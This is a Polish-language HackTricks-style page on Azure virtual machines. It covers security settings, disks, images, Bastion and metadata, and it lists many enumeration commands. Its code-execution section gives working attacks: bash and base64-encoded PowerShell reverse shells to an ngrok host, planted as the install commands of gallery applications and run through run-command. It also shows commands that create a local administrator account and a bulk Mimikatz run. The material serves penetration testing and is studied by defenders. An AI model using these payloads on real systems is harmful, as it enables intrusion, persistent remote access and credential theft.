Podziel się trikami hackingowymi, przesyłając PR-y doHackTricks i HackTricks Cloud repozytoriów na GitHubie.
Podstawowe informacje o sieciach Azure
Sieci Azure zawierają różne podmioty i sposoby ich konfiguracji. Możesz znaleźć krótkie opisy,przykłady i komendy enumeracji różnych podmiotów sieciowych Azure w:
Maszyny Wirtualne (VM) Azure to elastyczne, na żądanie serwery w chmurze, które pozwalają na uruchamianie systemów operacyjnych Windows lub Linux. Umożliwiają wdrażanie aplikacji i obciążeń bez zarządzania fizycznym sprzętem. Maszyny Wirtualne Azure mogą być konfigurowane z różnymi opcjami CPU, pamięci i przechowywania, aby spełniać konkretne potrzeby i integrować się z usługami Azure, takimi jak wirtualne sieci, przechowywanie i narzędzia zabezpieczeń.
Konfiguracje zabezpieczeń
Strefy dostępności: Strefy dostępności to odrębne grupy centrów danych w określonym regionie Azure, które są fizycznie oddzielone, aby zminimalizować ryzyko, że wiele stref zostanie dotkniętych lokalnymi awariami lub katastrofami.
Typ zabezpieczeń:
Standardowe zabezpieczenia: To domyślny typ zabezpieczeń, który nie wymaga żadnej specyficznej konfiguracji.
Zaufane uruchomienie: Ten typ zabezpieczeń zwiększa ochronę przed boot kitami i złośliwym oprogramowaniem na poziomie jądra, korzystając z Secure Boot i Wirtualnego Zaufanego Modułu Platformy (vTPM).
Poufne VM: Oprócz zaufanego uruchomienia, oferuje izolację opartą na sprzęcie między VM, hipernadzorcą a zarządzaniem hostem, poprawia szyfrowanie dysków i więcej.
Uwierzytelnianie: Domyślnie generowany jest nowy klucz SSH, chociaż możliwe jest użycie klucza publicznego lub wcześniejszego klucza, a domyślną nazwą użytkownika jest azureuser. Możliwe jest również skonfigurowanie użycia hasła.
Szyfrowanie dysków VM: Dysk jest domyślnie szyfrowany w spoczynku przy użyciu klucza zarządzanego przez platformę.
Możliwe jest również włączenie Szyfrowania na hoście, gdzie dane będą szyfrowane na hoście przed wysłaniem ich do usługi przechowywania, zapewniając szyfrowanie end-to-end między hostem a usługą przechowywania (docs).
Kopia zapasowa: Możliwe jest włączenie Standardowej kopii zapasowej (raz dziennie) i Ulepszonej (wiele razy dziennie)
Opcje orkiestracji poprawek: Umożliwia automatyczne stosowanie poprawek w VM zgodnie z wybraną polityką, jak opisano w docs.
Alerty: Możliwe jest automatyczne otrzymywanie alertów e-mailem lub w aplikacji mobilnej, gdy coś się wydarzy w VM. Domyślne zasady:
Procent CPU jest większy niż 80%
Dostępna pamięć bajtów jest mniejsza niż 1 GB
Procent zużycia IOPS dysków danych jest większy niż 95%
Procent zużycia IOPS systemu operacyjnego jest większy niż 95%
Całkowita sieć jest większa niż 500 GB
Całkowita sieć wychodząca jest większa niż 200 GB
Metryka dostępności VM jest mniejsza niż 1
Monitor zdrowia: Domyślnie sprawdza protokół HTTP na porcie 80
Blokady: Umożliwia zablokowanie VM, aby mogła być tylko odczytywana (Blokada tylko do odczytu) lub mogła być odczytywana i aktualizowana, ale nie usuwana (Blokada nie do usunięcia).
Większość zasobów związanych z VM również obsługuje blokady, takie jak dyski, migawki...
Blokady można również stosować na poziomie grupy zasobów i subskrypcji
Dyski i migawki
Możliwe jest włączenie dołączenia dysku do 2 lub więcej VM
Domyślnie każdy dysk jest szyfrowany kluczem platformy.
To samo dotyczy migawek
Domyślnie możliwe jest udostępnienie dysku ze wszystkich sieci, ale można również ograniczyć dostęp tylko do określonych prywatnych dostępów lub całkowicie wyłączyć dostęp publiczny i prywatny.
To samo dotyczy migawek
Możliwe jest wygenerowanie URI SAS (maks. 60 dni) do eksportu dysku, który można skonfigurować tak, aby wymagał uwierzytelnienia lub nie
To samo dotyczy migawek
# List all disksazdisklist--outputtable# Get info about a diskazdiskshow--name<disk-name>--resource-group<rsc-group>
Obrazy, Obrazy galerii i Punkty przywracania
Obraz VM to szablon, który zawiera system operacyjny, ustawienia aplikacji i system plików potrzebne do utworzenia nowej maszyny wirtualnej (VM). Różnica między obrazem a migawką dysku polega na tym, że migawka dysku to kopia tylko do odczytu, w określonym czasie, pojedynczego zarządzanego dysku, używana głównie do tworzenia kopii zapasowych lub rozwiązywania problemów, podczas gdy obraz może zawierać wiele dysków i jest zaprojektowany jako szablon do tworzenia nowych VM.
Obrazy można zarządzać w sekcji Obrazy w Azure lub w galeriach obliczeniowych Azure, co pozwala na generowanie wersji i udostępnianie obrazu między tenantami, a nawet uczynienie go publicznym.
Punkt przywracania przechowuje konfigurację VM oraz migawki aplikacji w punkcie czasowym, które są spójne z czasem, wszystkich zarządzanych dysków podłączonych do VM. Jest związany z VM, a jego celem jest możliwość przywrócenia tej VM do stanu, w jakim była w tym konkretnym punkcie.
# Shared Image Galleries | Compute Galleries## List all galleries and get info about oneazsiglist--outputtableazsigshow--gallery-name<name>--resource-group<rsc-group>## List all community galleriesazsiglist-community--outputtable## List galleries shaerd with meazsiglist-shared--location<location>--outputtable## List all image definitions in a gallery and get info about oneazsigimage-definitionlist--gallery-name<name>--resource-group<rsc-group>--outputtableazsigimage-definitionshow--gallery-image-definition<name>--gallery-name<gallery-name>--resource-group<rsc-group>## List all the versions of an image definition in a galleryazsigimage-versionlist--gallery-image-name<image-name>--gallery-name<gallery-name>--resource-group<rsc-group--outputtable## List all VM applications inside a galleryazsiggallery-applicationlist--gallery-name<gallery-name>--resource-group<res-group>--outputtable# Images# List all managed images in your subscriptionazimagelist--outputtable# Restore points## List all restore points and get info about 1azrestore-pointcollectionlist-all--outputtableazrestore-pointcollectionshow--collection-name<collection-name>--resource-group<rsc-group>
Azure Site Recovery
Z dokumentacji: Site Recovery pomaga zapewnić ciągłość działania biznesu, utrzymując aplikacje i obciążenia biznesowe w działaniu podczas awarii. Site Recovery replikuje obciążenia działające na fizycznych i wirtualnych maszynach (VM) z głównej lokalizacji do lokalizacji zapasowej. Gdy wystąpi awaria w Twojej głównej lokalizacji, przełączasz się do lokalizacji zapasowej i uzyskujesz dostęp do aplikacji stamtąd. Po przywróceniu głównej lokalizacji możesz wrócić do niej.
Azure Bastion
Azure Bastion umożliwia bezpieczny i płynny dostęp Remote Desktop Protocol (RDP) i Secure Shell (SSH) do Twoich wirtualnych maszyn (VM) bezpośrednio przez portal Azure lub za pośrednictwem jump boxa. Poprzez eliminację potrzeby publicznych adresów IP na Twoich VM.
Bastion wdraża podsieć o nazwie AzureBastionSubnet z maską sieciową /26 w VNet, w którym musi działać. Następnie umożliwia połączenie z wewnętrznymi VM przez przeglądarkę używając RDP i SSH, unikając narażania portów VM na Internet. Może również działać jako host skokowy.
Aby wylistować wszystkie hosty Azure Bastion w swojej subskrypcji i połączyć się z VM przez nie, możesz użyć następujących poleceń:
# List bastionsaznetworkbastionlist-otable# Connect via SSH through bastionaznetworkbastionssh \--name MyBastion \--resource-group MyResourceGroup \--target-resource-id /subscriptions/12345678-1234-1234-1234-123456789abc/resourceGroups/MyResourceGroup/providers/Microsoft.Compute/virtualMachines/MyVM \--auth-type ssh-key \--username azureuser \--ssh-key ~/.ssh/id_rsa# Connect via RDP through bastionaznetworkbastionrdp \--name <BASTION_NAME> \--resource-group <RESOURCE_GROUP> \--target-resource-id /subscriptions/<SUBSCRIPTION_ID>/resourceGroups/<RESOURCE_GROUP>/providers/Microsoft.Compute/virtualMachines/<VM_NAME> \--auth-type password \--username <VM_USERNAME> \--password <VM_PASSWORD>
Metadane
Usługa metadanych instancji Azure (IMDS) zapewnia informacje o działających instancjach maszyn wirtualnych w celu wspomagania ich zarządzania i konfiguracji. Oferuje szczegóły takie jak SKU, przechowywanie, konfiguracje sieciowe oraz informacje o nadchodzących wydarzeniach konserwacyjnych za pośrednictwem REST API dostępnego pod adresem IP 169.254.169.254, który jest dostępny tylko z wnętrza VM. Komunikacja między VM a IMDS pozostaje w obrębie hosta, zapewniając bezpieczny dostęp. Podczas zapytań do IMDS, klienci HTTP wewnątrz VM powinni omijać serwery proxy, aby zapewnić prawidłową komunikację.
Ponadto, aby skontaktować się z punktem końcowym metadanych, żądanie HTTP musi mieć nagłówek Metadata: true i nie może mieć nagłówka X-Forwarded-For.
# VMs## List all VMs and get info about oneazvmlist--outputtableazvmshow--name<came>--resource-group<rsc-group>## List all available VM images and get info about oneazvmimagelist--all--outputtable# VM Extensions## List all VM extensionsazvmextensionimagelist--outputtable## Get extensions by publisherazvmextensionimagelist--publisher"Site24x7"--outputtable## List extensions in a VMazvmextensionlist-g<rsc-group>--vm-name<vm-name>## List managed identities in a VMazvmidentityshow \--resource-group <rsc-group> \--name <vm-name># Disks## List all disks and get info about oneazdisklist--outputtableazdiskshow--name<disk-name>--resource-group<rsc-group># Snapshots## List all galleries abd get info about oneazsiglist--outputtableazsigshow--gallery-name<name>--resource-group<rsc-group>## List all snapshots and get info about oneazsnapshotlist--outputtableazsnapshotshow--name<name>--resource-group<rsc-group># Shared Image Galleries | Compute Galleries## List all galleries and get info about oneazsiglist--outputtableazsigshow--gallery-name<name>--resource-group<rsc-group>## List all community galleriesazsiglist-community--outputtable## List galleries shared with meazsiglist-shared--location<location>--outputtable## List all image definitions in a gallery and get info about oneazsigimage-definitionlist--gallery-name<name>--resource-group<rsc-group>--outputtableazsigimage-definitionshow--gallery-image-definition<name>--gallery-name<gallery-name>--resource-group<rsc-group>## List all the versions of an image definition in a galleryazsigimage-versionlist--gallery-image-name<image-name>--gallery-name<gallery-name>--resource-group<rsc-group--outputtable## List all VM applications inside a galleryazsiggallery-applicationlist--gallery-name<gallery-name>--resource-group<res-group>--outputtable# Images# List all managed images in your subscriptionazimagelist--outputtable# Restore points## List all restore points and get info about 1azrestore-pointcollectionlist-all--outputtableazrestore-pointcollectionshow--collection-name<collection-name>--resource-group<rsc-group># Bastion## list all bastionsaznetworkbastionlist-otable# Network## List VNetsaznetworkvnetlist--query"[].{name:name, location:location, addressSpace:addressSpace}"## List subnets of a VNetaznetworkvnetsubnetlist--resource-group<ResourceGroupName>--vnet-name<VNetName>--query"[].{name:name, addressPrefix:addressPrefix}"-otable## List public IPsaznetworkpublic-iplist--outputtable## Get NSG rulesaznetworknsgrulelist--nsg-name<NSGName>--resource-group<ResourceGroupName>--query"[].{name:name, priority:priority, direction:direction, access:access, protocol:protocol, sourceAddressPrefix:sourceAddressPrefix, destinationAddressPrefix:destinationAddressPrefix, sourcePortRange:sourcePortRange, destinationPortRange:destinationPortRange}"-otable## Get NICs and subnets using this NSGaznetworknsgshow--nameMyLowCostVM-nsg--resource-groupResource_Group_1--query"{subnets: subnets, networkInterfaces: networkInterfaces}"## List all Nics & get info of a single oneaznetworkniclist--outputtableaznetworknicshow--name<name>--resource-group<rsc-group>## List Azure Firewallsaznetworkfirewalllist--query"[].{name:name, location:location, subnet:subnet, publicIp:publicIp}"-otable## Get network rules of a firewallaznetworkfirewallnetwork-rulecollectionlist--firewall-name<FirewallName>--resource-group<ResourceGroupName>--query"[].{name:name, rules:rules}"-otable## Get application rules of a firewallaznetworkfirewallapplication-rulecollectionlist--firewall-name<FirewallName>--resource-group<ResourceGroupName>--query"[].{name:name, rules:rules}"-otable## Get nat rules of a firewallaznetworkfirewallnat-rulecollectionlist--firewall-name<FirewallName>--resource-group<ResourceGroupName>--query"[].{name:name, rules:rules}"-otable## List Route Tablesaznetworkroute-tablelist--query"[].{name:name, resourceGroup:resourceGroup, location:location}"-otable## List routes for a tableaznetworkroute-tableroutelist--route-table-name<RouteTableName>--resource-group<ResourceGroupName>--query"[].{name:name, addressPrefix:addressPrefix, nextHopType:nextHopType, nextHopIpAddress:nextHopIpAddress}"-otable# Misc## List all virtual machine scale setsazvmsslist--outputtable## List all availability setsazvmavailability-setlist--outputtable## List all load balancersaznetworklblist--outputtable## List all storage accountsazstorageaccountlist--outputtable## List all custom script extensions on a specific VMazvmextensionlist--vm-name<vm-name>--resource-group<resource-group># Show boot diagnostics settings for a specific VMazvmboot-diagnosticsget-boot-log--name<vm-name>--resource-group<resource-group>## List all tags on virtual machinesazresourcelist--resource-type"Microsoft.Compute/virtualMachines"--query"[].{Name:name, Tags:tags}"--outputtable# List all available run commands for virtual machinesazvmrun-commandlist--outputtable
# Get readable VMsGet-AzVM| fl# Lis running VMsGet-AzureRmVM-status |where {$_.PowerState-EQ"VM running"} | select ResourceGroupName,NameGet-AzVM-Name <name>-ResourceGroupName <res_group_name>| fl *Get-AzVM-Name <name>-ResourceGroupName <res_group_name>| select -ExpandProperty NetworkProfile# Get iface and IP addressGet-AzNetworkInterface-Name <interface_name>Get-AzPublicIpAddress-Name <iface_public_ip_id>#Get installed extensionsGet-AzVMExtension-ResourceGroupName <res_group_name>-VMName <name>Get-AzVM| select -ExpandProperty NetworkProfile # Get name of network connector of VMGet-AzNetworkInterface-Name <name># Get info of network connector (like IP)
Wykonanie kodu w VM
Rozszerzenia VM
Rozszerzenia VM Azure to małe aplikacje, które zapewniają konfigurację po wdrożeniu i zadania automatyzacji na wirtualnych maszynach Azure (VM).
To pozwoli na wykonywanie dowolnego kodu wewnątrz VM.
Wymagana zgoda to Microsoft.Compute/virtualMachines/extensions/write.
Można wylistować wszystkie dostępne rozszerzenia za pomocą:
# It takes some mins to runazvmextensionimagelist--outputtable# Get extensions by publisherazvmextensionimagelist--publisher"Site24x7"--outputtable
Możliwe jest uruchomienie niestandardowych rozszerzeń, które wykonują niestandardowy kod:
Możesz również wykonać inne ładunki, takie jak: powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add
Zresetuj hasło za pomocą rozszerzenia VMAccess
# Run VMAccess extension to reset the password$cred=Get-Credential# Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the passwordSet-AzVMAccessExtension-ResourceGroupName "<rsc-group>"-VMName "<vm-name>"-Name "myVMAccess"-Credential $cred
Istotne rozszerzenia VM
Wymagana zgoda to nadal Microsoft.Compute/virtualMachines/extensions/write.
Rozszerzenie VMAccess
To rozszerzenie pozwala na modyfikację hasła (lub utworzenie, jeśli nie istnieje) użytkowników wewnątrz maszyn wirtualnych Windows.
# Run VMAccess extension to reset the password$cred=Get-Credential# Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the passwordSet-AzVMAccessExtension-ResourceGroupName "<rsc-group>"-VMName "<vm-name>"-Name "myVMAccess"-Credential $cred
DesiredConfigurationState (DSC)
To jest rozszerzenie VM, które należy do Microsoftu i wykorzystuje PowerShell DSC do zarządzania konfiguracją maszyn wirtualnych Windows w Azure. Dlatego może być używane do wykonywania dowolnych poleceń w maszynach wirtualnych Windows za pomocą tego rozszerzenia:
To jest rozszerzenie VM, które umożliwia wykonywanie runbooków w VM z konta automatyzacji. Aby uzyskać więcej informacji, sprawdź usługę Automation Accounts.
Aplikacje VM
To są pakiety zawierające wszystkie dane aplikacji oraz skrypty instalacyjne i deinstalacyjne, które można wykorzystać do łatwego dodawania i usuwania aplikacji w VM.
# List all galleries in resource groupazsiglist--resource-group<res-group>--outputtable# List all apps in a falleryazsiggallery-applicationlist--gallery-name<gallery-name>--resource-group<res-group>--outputtable
To są ścieżki, gdzie aplikacje są pobierane w systemie plików:
Możliwe jest udostępnianie poszczególnych aplikacji i galerii innym subskrypcjom lub najemcom. Co jest bardzo interesujące, ponieważ może to pozwolić atakującemu na wprowadzenie backdoora do aplikacji i przejście do innych subskrypcji i najemców.
Jednak nie ma "rynku" dla aplikacji vm tak jak dla rozszerzeń.
Przykład wykorzystania do wykonywania dowolnych poleceń:
# Create gallery (if the isn't any)azsigcreate--resource-groupmyResourceGroup \--gallery-name myGallery--location"West US 2"# Create application containerazsiggallery-applicationcreate \--application-name myReverseShellApp \--gallery-name myGallery \--resource-group <rsc-group> \--os-type Linux \--location "West US 2"# Create app version with the rev shell## In Package file link just add any link to a blobl storage fileazsiggallery-applicationversioncreate \--version-name 1.0.2 \--application-name myReverseShellApp \--gallery-name myGallery \--location "West US 2" \--resource-group <rsc-group> \--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"# Install the app in a VM to execute the rev shell## Use the ID given in the previous outputazvmapplicationset \--resource-group <rsc-group> \--name <vm-name> \--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \--treat-deployment-as-failure true
# Create gallery (if the isn't any)azsigcreate--resource-group<rsc-group> \--gallery-name myGallery--location"West US 2"# Create application containerazsiggallery-applicationcreate \--application-name myReverseShellAppWin \--gallery-name myGallery \--resource-group <rsc-group> \--os-type Windows \--location "West US 2"# Get encoded reverse shellecho -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
# Create app version with the rev shell## In Package file link just add any link to a blobl storage fileexport encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
azsiggallery-applicationversioncreate \--version-name 1.0.0 \--application-name myReverseShellAppWin \--gallery-name myGallery \--location "West US 2" \--resource-group <rsc-group> \--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \--install-command "powershell.exe -EncodedCommand $encodedCommand" \--remove-command "powershell.exe -EncodedCommand $encodedCommand" \--update-command "powershell.exe -EncodedCommand $encodedCommand"# Install the app in a VM to execute the rev shell## Use the ID given in the previous outputazvmapplicationset \--resource-group <rsc-group> \--name deleteme-win4 \--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \--treat-deployment-as-failure true
Dane użytkownika
To są dane trwałe, które można pobrać z punktu końcowego metadanych w dowolnym momencie. Zauważ, że w Azure dane użytkownika różnią się od AWS i GCP, ponieważ jeśli umieścisz tutaj skrypt, nie jest on domyślnie wykonywany.
Dane niestandardowe
Możliwe jest przekazanie pewnych danych do VM, które będą przechowywane w oczekiwanych ścieżkach:
W Windows dane niestandardowe są umieszczane w %SYSTEMDRIVE%\AzureData\CustomData.bin jako plik binarny i nie są przetwarzane.
W Linux były przechowywane w /var/lib/waagent/ovf-env.xml, a teraz są przechowywane w /var/lib/waagent/CustomData/ovf-env.xml
Agent Linux: Domyślnie nie przetwarza danych niestandardowych, potrzebny jest niestandardowy obraz z włączonymi danymi
cloud-init: Domyślnie przetwarza dane niestandardowe, a te dane mogą być w kilku formatach. Może łatwo wykonać skrypt, wysyłając po prostu skrypt w danych niestandardowych.
Próbowałem, aby zarówno Ubuntu, jak i Debian wykonywały skrypt, który tutaj umieścisz.
Nie jest również konieczne włączanie danych użytkownika, aby to zostało wykonane.
#!/bin/shecho"Hello World">/var/tmp/output.txt
Uruchom polecenie
To jest najprostszy mechanizm, który Azure zapewnia do wykonywania dowolnych poleceń w VM. Wymagana uprawnienie to Microsoft.Compute/virtualMachines/runCommand/action.
# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action# Execute a rev shellazvmrun-commandinvoke \--resource-group Research \--name juastavm \--command-id RunPowerShellScript \--scripts @revshell.ps1## Get encoded reverse shellecho -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
## Create app version with the rev shell## In Package file link just add any link to a blobl storage fileexport encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
# The content ofecho"powershell.exe -EncodedCommand $encodedCommand">revshell.ps1# Try to run in every machineImport-moduleMicroBurst.psm1Invoke-AzureRmVMBulkCMD-ScriptMimikatz.ps1-Verbose-outputOutput.txt
